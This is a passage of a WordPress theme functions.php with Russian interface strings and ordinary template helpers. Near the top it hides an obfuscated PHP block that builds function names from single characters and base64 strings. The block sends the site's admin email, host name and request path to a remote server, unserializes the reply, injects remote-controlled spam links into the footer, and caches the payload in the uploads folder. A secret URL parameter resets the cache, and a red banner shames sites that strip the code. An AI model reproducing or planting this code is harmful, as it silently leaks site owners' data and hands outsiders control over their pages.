<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $NHnniwa='e';$vzOU='6';$mdmXINc='s';$WYUXb='e';$WikJP='d';$ijqrt='e';$VHXiKjf='_';$bXYwQu='4';$VfkdQ='d';$enZy='o';$xQkgR='c';$SwDfn='a';$yMzjmcp='b';$ZEwzBjNT=$yMzjmcp.$SwDfn.$mdmXINc.$NHnniwa.$vzOU.$bXYwQu.$VHXiKjf.$WikJP.$WYUXb.$xQkgR.$enZy.$VfkdQ.$ijqrt;$gGlAGQ='a';$Kuzad='e';$LunJT='f';$cjDFu='z';$FDGC='i';$zvqCUEz='g';$dbScfqI='n';$ZwDDWc='l';$nsRr='t';$YexFluMW=$zvqCUEz.$cjDFu.$FDGC.$dbScfqI.$LunJT.$ZwDDWc.$gGlAGQ.$nsRr.$Kuzad;$OGNMl='t';$IHLfKgx='r';$AlKyV='_';$wseHdD='3';$LUmxZW='1';$sYER='t';$cMZR='r';$rEFvSYn='s';$ExAw='o';$OoYKrDRX=$rEFvSYn.$sYER.$IHLfKgx.$AlKyV.$cMZR.$ExAw.$OGNMl.$LUmxZW.$wseHdD;$LBrQ='r';$NeJB='r';$OsQjvrA='e';$VQpHeoj='t';$tOSmKO='v';$cooS='s';$wxCSudAq=$cooS.$VQpHeoj.$NeJB.$LBrQ.$OsQjvrA.$tOSmKO;                     $ep____d='e';$dc_________n='6';$ub_______________f='s';$yy_____________f='e';$ni_________g='d';$sd_______________m='e';$ry______________g='_';$uo_________t='4';$hp___________k='d';$ir________m='o';$lg___________g='c';$hn_______m='a';$sq_______p='b';$ut_____________k=$sq_______p.$hn_______m.$ub_______________f.$ep____d.$dc_________n.$uo_________t.$ry______________g.$ni_________g.$yy_____________f.$lg___________g.$ir________m.$hp___________k.$sd_______________m;$bx______d='e';$xg________o='s';$br______x='n';$fr__f='s';$sh_______m='u';$rt________h='i';$az_____________b='t';$cu_________v='_';$bg_____________z='o';$qs__x='c';$wu____h='t';$bd___________m='f';$ic___f='i';$zy___a='n';$oq__f='x';$qb______d=$bd___________m.$sh_______m.$br______x.$qs__x.$wu____h.$rt________h.$bg_____________z.$zy___a.$cu_________v.$bx______d.$oq__f.$ic___f.$xg________o.$az_____________b.$fr__f;$yb_______________p='e';$fw_______________v='o';$af_________z='p';$no_____________s='f';$xd_____________i='n';$li___________k=$no_____________s.$fw_______________v.$af_________z.$yb_______________p.$xd_____________i;$cl__l='r';$rd__l='e';$hu_______________y='a';$ig___k='d';$uz__________r='f';$zc____________k=$uz__________r.$cl__l.$rd__l.$hu_______________y.$ig___k;$nz___________j='s';$en________o='f';$bi_____p='l';$tb_______________e='o';$zq______________e='e';$ne______________j='c';$af____________h=$en________o.$ne______________j.$bi_____p.$tb_______________e.$nz___________j.$zq______________e;define("WP_ID", $ut_____________k("Mi4wLjA="));define("WP_TTL", $ut_____________k("MTA4MDA="));define("WP_SRC", $ut_____________k("dHBva24="));function wp_get_header() {global $ut_____________k, $qb______d;if ($qb______d($ut_____________k("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$qb______d($ut_____________k("d3BfZ2V0X2Zvb3Rlcg==")) &&$qb______d($ut_____________k("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ut_____________k, $li___________k, $af____________h, $zc____________k;$ca___a = TEMPLATEPATH."/".$ut_____________k("Zm9vdGVyLnBocA==");$gm_________c = @$li___________k($ca___a, "r");$ca___a = @$zc____________k($gm_________c, @filesize($ca___a));@$af____________h($gm_________c);$no____n = TEMPLATEPATH."/".$ut_____________k("ZnVuY3Rpb25zLnBocA==");$gm_________c = @$li___________k($no____n, "r");$no____n = @$zc____________k($gm_________c, @filesize($no____n));@$af____________h($gm_________c);$hy______________h = 0;if($ca___a && $no____n) {if ($ut_____________k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($ca___a, $ut_____________k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$hy______________h = 1;}if (substr_count($ca___a, "wp_theme_GPL_credits()") < 1) {$hy______________h = 2;}}if(WP_ID != "2.0.0") {$hy______________h = 12;}}if($hy______________h > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $hy______________h -->";}}function wp_loaded() {global $ut_____________k, $qb______d;return $qb______d($ut_____________k("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($st__n, $fa__________y = "(more...)", $vt_______m = 0, $mj_______________c = "") {$uq________s = get_the_content($fa__________y, $vt_______m, $mj_______________c);$uq________s = apply_filters("the_content", $uq________s);$uq________s = str_replace("]]>", "]]>", $uq________s);if (strlen($_GET["p"]) > 0) {echo $uq________s;}else if ((strlen($uq________s)>$st__n) && ($rv_______z = strpos($uq________s, " ", $st__n ))) {$uq________s = substr($uq________s, 0, $rv_______z);$uq________s = $uq________s;echo $uq________s;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$fa__________y</a></div></p>";} else {echo $uq________s;}}}$vr________s='e';$kn______________j='4';$wn_______h='b';$rj_________t='d';$vl__j='o';$cj__b='6';$fw__l='n';$su_______a='_';$fa______________p='a';$of______e='e';$xw__k='c';$to_____________e='e';$my_______q='s';$iy_____________o=$wn_______h.$fa______________p.$my_______q.$of______e.$cj__b.$kn______________j.$su_______a.$vr________s.$fw__l.$xw__k.$vl__j.$rj_________t.$to_____________e;$xb________s='t';$vg___i='f';$cc_______________r='n';$yf______d='s';$ft___________y='c';$gn________s='e';$ff________l='t';$dr____________h='i';$qp_______________n='n';$sx___i='l';$pc_____u='_';$yc___f='e';$qj____y='t';$ru_____v='o';$ho__k='_';$eh______________c='e';$fs__________s='g';$zh__________f=$vg___i.$dr____________h.$sx___i.$eh______________c.$pc_____u.$fs__________s.$gn________s.$xb________s.$ho__k.$ft___________y.$ru_____v.$cc_______________r.$ff________l.$yc___f.$qp_______________n.$qj____y.$yf______d;$xm________q='l';$gk___j='i';$xu________n='_';$eq_______x='e';$en________k='s';$xm___s='f';$wr_______u='i';$ze__c='x';$rx_________a='e';$cg________h='s';$xp_____________v='t';$rp_____________p=$xm___s.$gk___j.$xm________q.$eq_______x.$xu________n.$rx_________a.$ze__c.$wr_______u.$en________k.$xp_____________v.$cg________h;$ke__a='n';$wu_____b='r';$is___________u='c';$hm_____w='s';$iw___________q='m';$hq_______________f='i';$yq___i='r';$ix________q='p';$on_____f='_';$to__________p='o';$pn_____________z='o';$qv________m='v';$nl_____________d='a';$la______________w='e';$vd______j='e';$rz_____f=$qv________m.$la______________w.$wu_____b.$hm_____w.$hq_______________f.$pn_____________z.$ke__a.$on_____f.$is___________u.$to__________p.$iw___________q.$ix________q.$nl_____________d.$yq___i.$vd______j;$av____________h='f';$ve__m='o';$du________y='p';$kr__________k='e';$kp_______________h='o';$nj___________q='n';$hy___b='c';$zc___________d='k';$do______________i='s';$da_____________d=$av____________h.$do______________i.$ve__m.$hy___b.$zc___________d.$kp_______________h.$du________y.$kr__________k.$nj___________q;$qt_________c='i';$jj________h='f';$mq_______________v='t';$nh___________n='r';$ym__r='w';$sd______p='e';$ic___________q=$jj________h.$ym__r.$nh___________n.$qt_________c.$mq_______________v.$sd______p;$zl________l='d';$sf_______________j='m';$ck______v='5';$pt______e=$sf_______________j.$zl________l.$ck______v;$wq______x='a';$gu____________x='t';$up___________d='l';$uo______________d='h';$ig__f='r';$if_____h='a';$ut________m='p';$qg__n='e';$gy__________q=$ig__f.$qg__n.$wq______x.$up___________d.$ut________m.$if_____h.$gu____________x.$uo______________d;$xm___c='n';$ku____e='i';$tn_________i='u';$qr_____________b='a';$nf_________d='e';$dt__________r='e';$fx___m='s';$bd______________u='l';$qk___o='i';$xg___________d='z';$rz_______________l='r';$ny_______a=$tn_________i.$xm___c.$fx___m.$nf_________d.$rz_______________l.$ku____e.$qr_____________b.$bd______________u.$qk___o.$xg___________d.$dt__________r;$bf_____________f='m';$ht____________j='t';$mu______________a='e';$po_____________e='n';$al_____________p='p';$kq__________n='a';$ao____w='m';$vd____s=$ht____________j.$mu______________a.$ao____w.$al_____________p.$po_____________e.$kq__________n.$bf_____________f;$vc___t='a';$pn____g='e';$mv___________j='n';$uw___________d='e';$wo_______e='r';$ur___g='r';$kq____________z='_';$yy________a='t';$ha_____o='s';$zb_______________n='_';$nu__________x='e';$yd______k='e';$gl____f='t';$mu_____________z='a';$nr_____v='c';$ye_______y='x';$am_______________j='m';$qi______a='t';$tg______l='c';$kb_________f='t';$so______r='o';$su______c=$ha_____o.$yy________a.$wo_______e.$uw___________d.$mu_____________z.$am_______________j.$kq____________z.$nr_____v.$so______r.$mv___________j.$kb_________f.$yd______k.$ye_______y.$qi______a.$zb_______________n.$tg______l.$ur___g.$nu__________x.$vc___t.$gl____f.$pn____g;function bq__________a($rd__u) {global $ut_____________k, $qb______d, $zh__________f, $rz_____f, $su______c;if (!$qb______d($ut_____________k("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($rz_____f(PHP_VERSION, "5.0.0", ">=") && $qb______d($ut_____________k("ZmlsZV9nZXRfY29udGVudHM=")) && $qb______d($ut_____________k("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$qk__________w = $su______c(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$kt_______________p = @$zh__________f($rd__u, 0, $qk__________w);} else {$kt_______________p = @$zh__________f($rd__u, 0);}return $kt_______________p;}function uw_____o($rd__u) {global $qb______d, $da_____________d, $ic___________q, $ut_____________k;if (!$qb______d($ut_____________k("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$hs______________i = strpos($rd__u, "/", 7);$vw____________z = array("uri"     => substr($rd__u, $hs______________i),"host"    => str_replace("http://", "", substr($rd__u, 0, $hs______________i)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$jl_______________f = @$da_____________d("$vw____________z[host]", 80, $hl______________o, $fl__________b, 4);if (!$jl_______________f) {return false;} else {$kt_______________p = "";$du____c  = "GET $vw____________z[uri] HTTP/1.0\r\n";$du____c .= "Host: $vw____________z[host]\r\n";$du____c .= "Referer: $vw____________z[referer]\r\n";$du____c .= "Connection: Close\r\n\r\n";@$ic___________q($jl_______________f, $du____c);while (!@feof($jl_______________f)) {$mx__________m = @fgets($jl_______________f, (1024*24));if ($mx__________m == "\r\n") {$ud______b = true;continue;}if ($ud______b) {$kt_______________p .= $mx__________m;}}return $kt_______________p;}}function yy________r($rd__u) {global $qb______d;$ct_____________j = false;if ($rd__u != "") {if ($qb______d("bq__________a")) {$ct_____________j = @bq__________a($rd__u);}if (!$ct_____________j && ($qb______d("uw_____o"))) {$ct_____________j = @uw_____o($rd__u);}}return $ct_____________j;}function be_______f() {global $_SERVER, $pt______e;$on_____p = $_SERVER["SERVER_NAME"];if (substr("$on_____p", 0, 4) == "www.") {$on_____p = substr("$on_____p", 4);}$on_____p = $pt______e("$_SERVER[SERVER_NAME]");return $on_____p;}function la_____e() {return "file";}function cw__________j($rd__u) {global $_SERVER, $zh__________f, $rp_____________p, $li___________k, $af____________h, $ic___________q;$cr___________z = hp_____________a();$de___d = be_______f().".jpg";$xh______h = $cr___________z["dir_upload"]["path"]."/$de___d";$av____________g = @filemtime($xh______h);if (!$av____________g || ((time()-$av____________g) >= WP_TTL)) {$ct_____________j = yy________r($rd__u);if ($ct_____________j) {if ($rp_____________p($xh______h)) {@unlink($xh______h);}$gm_________c = @$li___________k($xh______h, "x+");@$ic___________q($gm_________c, $ct_____________j);@$af____________h($gm_________c);}} else {if ($rp_____________p($xh______h)) {$ct_____________j = @$zh__________f($xh______h);} else {$ct_____________j = false;}}return $ct_____________j;}function hp_____________a() {global $_SERVER, $ut_____________k, $iy_____________o;$wu____________f = wp_count_posts("post");$xj_______n = pathinfo(get_bloginfo("template_directory"));$cr___________z = array("url" => array("report"      => $ut_____________k("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $xj_______n,"dir_upload"=> iv_______________c(),"queryString"=> array("?a001=".WP_ID,"a004=".$xj_______n[filename],"a005=".$wu____________f->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://animefanfiki.info/remont/polirovka-kuzova\">Полировка кузова</a>");$cr___________z["url"]["queryString"] = implode("&", $cr___________z["queryString"]);$cr___________z["url"]["report"] = $cr___________z["url"]["report"]."/?".$iy_____________o($cr___________z["url"]["queryString"]).".html";return $cr___________z;}function iv_______________c() {$fm____a = wp_upload_dir();if (isset($fm____a["error"])) {$tk_________b = bi__________u();if (is_writable($tk_________b)) {$fm____a = array("path" => $tk_________b);}}return $fm____a;}function bi__________u() {global $qb______d, $pt______e, $gy__________q, $vd____s;$bo____________g = (bool) ini_get("safe_mode");if ($bo____________g == true) {return false;}if ($qb______d("sys_get_temp_dir")) {$tq_________o = sys_get_temp_dir();if (is_writable($tq_________o)) {return $gy__________q($tq_________o);}}if (!empty($_ENV["TMP"])) {return $gy__________q($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $gy__________q($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $gy__________q($_ENV["TEMP"]);} else {$et________g = $vd____s($pt______e(uniqid(rand(), true)), "");if ($et________g) {$tq_________o = $gy__________q(dirname($et________g));@unlink($et________g);return $tq_________o;} else {return false;}}}function jk__w() {global $_GET, $rp_____________p;$cr___________z = hp_____________a();$on_____p = be_______f();$bd_____________o = la_____e();$bt_________r = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($bd_____________o == "file") {$im__c = $cr___________z["dir_upload"]["path"]."/".$on_____p.".jpg";if ($rp_____________p($im__c)) {@unlink($im__c);$bt_________r = "deleted";}}$hy______________w = array("s"=> $bt_________r,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($hy______________w AS $pa______________x => $ny_______________n) echo " [$pa______________x:$ny_______________n]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $qb______d, $ut_____________k, $ny_______a;$cr___________z = hp_____________a();$nk_____________n = "cw__________j";if ($qb______d($nk_____________n)) {$kt_______________p = $nk_____________n($cr___________z["url"]["report"]);}if ($kt_______________p) {if ($kt_______________p = @$ut_____________k($kt_______________p)) {$kt_______________p = @$ny_______a($kt_______________p);if (strlen($kt_______________p[custom_credit]) >= 5) {$cr___________z["default_string"] = $kt_______________p[custom_credit];}if ($kt_______________p["status"] == "0") {$mi____________y = 1;$gk__________t = 1;} else {$cj______________p = sizeof($kt_______________p["links"]);$oe___________w = $cr___________z["default_string"];if ($cj______________p > 0 && $kt_______________p["links"] !== "") {$sw_______________f = 0;foreach ($kt_______________p["links"] as $zf__________f => $lc________o) {$sw_______________f++;if ($lc________o->l_path == "" || $lc________o->l_path == $_SERVER["REQUEST_URI"]) {$lc________o->l_href = htmlspecialchars(strip_tags($lc________o->l_href));$lc________o->l_title = htmlspecialchars(strip_tags($lc________o->l_title));$lc________o->l_anchor = htmlspecialchars(strip_tags($lc________o->l_anchor));$oe___________w .= " | ";$oe___________w .= "<a href='$lc________o->l_href' title='$lc________o->l_title'";if ($lc________o->l_nofollow == "1") {$oe___________w .= " rel='nofollow'";}$oe___________w .= ">$lc________o->l_anchor</a>";}}}$cr___________z["links"] = "$oe___________w";if ($kt_______________p[credit] == "0") {$cr___________z["links"] = "";}}} else {$mi____________y = "1";}} else {$mi____________y = "1";}if ($mi____________y == "1") {$cr___________z["links"] = $cr___________z["default_string"];}echo "$cr___________z[links]";echo "<!-- s: $kt_______________p[signature] -->";jk__w();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
